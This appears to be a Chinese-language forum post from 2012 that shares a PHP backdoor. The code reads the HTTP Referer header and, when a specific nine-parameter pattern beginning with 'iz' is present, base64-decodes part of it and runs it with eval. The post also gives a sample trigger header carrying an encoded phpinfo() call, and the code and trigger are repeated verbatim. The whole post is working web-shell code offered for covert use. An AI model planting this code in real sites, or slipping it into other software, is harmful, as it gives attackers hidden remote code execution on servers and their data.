-
-
[分享]另类PHP Referer后门
-
发表于: 2012-2-25 12:02
-
通过HTTP请求中的Referer运行经过Base64编码的命令,达到后门效果。
--Code--
parse_str($_SERVER['HTTP_REFERER'],$a); if(reset($a)=='iz' &&
count($a)==9) { echo '<star>';eval(base64_decode(str_replace(" ", "+",
join(array_slice($a,count($a)-3)))));echo '</star>';}
----------
在HTTP请求中的的Referer代码:
Referer: a1=iz&a2=&a3=&a4=&a5=&a6=&a7=&a8=&a0=cGhwaW5mbygpOw==
其中&a0=后门接运行的命令的Base64编码,本地测试成功。
别人的测试截图:
原文地址:
http://www.gossamer-threads.com/lists/fulldisc/full-disclosure/85118
--Code--
parse_str($_SERVER['HTTP_REFERER'],$a); if(reset($a)=='iz' &&
count($a)==9) { echo '<star>';eval(base64_decode(str_replace(" ", "+",
join(array_slice($a,count($a)-3)))));echo '</star>';}
----------
在HTTP请求中的的Referer代码:
Referer: a1=iz&a2=&a3=&a4=&a5=&a6=&a7=&a8=&a0=cGhwaW5mbygpOw==
其中&a0=后门接运行的命令的Base64编码,本地测试成功。
别人的测试截图:
原文地址:
http://www.gossamer-threads.com/lists/fulldisc/full-disclosure/85118
